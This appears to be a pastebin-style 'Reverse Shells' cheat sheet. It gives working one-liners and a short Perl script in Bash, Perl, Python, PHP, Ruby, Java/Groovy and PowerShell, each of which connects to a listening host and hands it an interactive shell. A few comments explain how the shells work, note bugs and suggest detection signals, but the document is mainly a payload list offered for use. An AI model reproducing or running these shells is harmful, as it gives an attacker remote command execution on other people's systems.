joemccray

Reverse Shells

Jul 23rd, 2015
  1. exec /bin/bash 0&0 2>&0
  2.  
  3. ########
  4. # Bash #
  5. ########
  6. bash -i >& /dev/tcp/192.168.153.2/1234 0>&1
  7.  
  8.  
  9.  
  10. ########
  11. # Perl #
  12. ########
  13. perl -e 'use Socket;$i="127.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  14.  
  15.  
  16.  
# File form of the one-liner above; host and port are taken from argv.
cat perlbackdoor.pl
#!/usr/bin/perl
use Socket;
use FileHandle;
# argv is used unvalidated and the connect() status is never checked, so the
# script proceeds to spawn the shell regardless of whether a connection exists.
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
# The socket is duplicated onto all three standard streams before the shell
# is started, so the shell's I/O is the network connection.
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("/bin/sh -i");
  30.  
  31.  
  32. ##########
  33. # Python #
  34. ##########
  35. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  36.  
  37.  
  38. #######
  39. # Php #
  40. #######
  41. php -r '$sock=fsockopen("127.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
  42.  
  43.  
  44. ########
  45. # ruby #
  46. ########
  47. ruby -rsocket -e'f=TCPSocket.open("127.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
  48.  
  49.  
  50.  
########
# Java #
########
// Groovy/Java reverse shell: Runtime.exec() spawns `/bin/bash -c`, which opens
// fd 5 on bash's /dev/tcp pseudo-path to 10.0.0.1:2002 and then runs each line
// read from the socket via an unquoted `$line` (the `\$` stops Groovy from
// interpolating it). Detection signal: a JVM process spawning bash that holds
// an outbound TCP connection.
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
// Blocks the calling thread until the bash child exits.
p.waitFor()
  57.  
  58.  
# Plain-bash variants of the command the Java snippet above passes to bash.
# `exec 5<>` opens fd 5 read/write on a socket to 127.0.0.1:1234; each line
# received is executed via an unquoted `$line` and its output goes back on fd 5.
exec 5<>/dev/tcp/127.0.0.1/1234


cat <&5 | while read line; do $line 2>&5 >&5; done

exec 5<>/dev/tcp/127.0.0.1/1234

# Same loop without the cat pipeline: `read` takes its input from fd 5 directly.
while read line 0<&5; do $line 2>&5 >&5; done
# As copied, `0<&196` runs before the following exec opens fd 196, so that
# first redirection presumably fails; the rest is the same pattern on fd 196
# with a non-interactive `sh`.
0<&196;exec 196<>/dev/tcp/127.0.0.1/1234; sh <&196 >&196 2>&196
  68.  
  69.  
##############
# Powershell #
##############
# PowerShell reverse shell: a TcpClient to 127.0.0.1:1234 whose stream is
# relayed line by line to and from a cmd.exe started with redirected
# stdin/stdout (stderr is not redirected). The inner loop calls `cleanup`,
# which is never defined — the cleanup function is named ReverseShellClean —
# so a dropped connection at that point presumably raises a command-not-found
# error instead of exiting cleanly.
# Detection signal: powershell.exe launched with -command that spawns cmd.exe
# while holding an outbound TCP connection; PowerShell script block logging
# (event 4104) records the full command text.
powershell -command "function ReverseShellClean {if ($client.Connected -eq $true) {$client.Close()}; if ($process.ExitCode -ne $null) {$process.Close()}; exit; };$address = '127.0.0.1'; $port = '1234';$client = New-Object system.net.sockets.tcpclient; $client.connect($address,$port) ;$stream = $client.GetStream();$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize ;$process = New-Object System.Diagnostics.Process ;$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' ;$process.StartInfo.RedirectStandardInput = 1 ;$process.StartInfo.RedirectStandardOutput = 1;$process.StartInfo.UseShellExecute = 0 ;$process.Start() ;$inputstream = $process.StandardInput ;$outputstream = $process.StandardOutput ;Start-Sleep 1 ;$encoding = new-object System.Text.AsciiEncoding ;while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())};$stream.Write($encoding.GetBytes($out),0,$out.Length) ;$out = $null; $done = $false; $testing = 0; ;while (-not $done) {if ($client.Connected -ne $true) {cleanup} ;$pos = 0; $i = 1; while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos); $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}} ;if ($pos -gt 0){ $string = $encoding.GetString($networkbuffer,0,$pos); $inputstream.write($string); start-sleep 1; if ($process.ExitCode -ne $null) {ReverseShellClean};else { $out = $encoding.GetString($outputstream.Read()); while($outputstream.Peek() -ne -1){; $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}; $stream.Write($encoding.GetBytes($out),0,$out.length); $out = $null; $string = $null}} else {ReverseShellClean}};"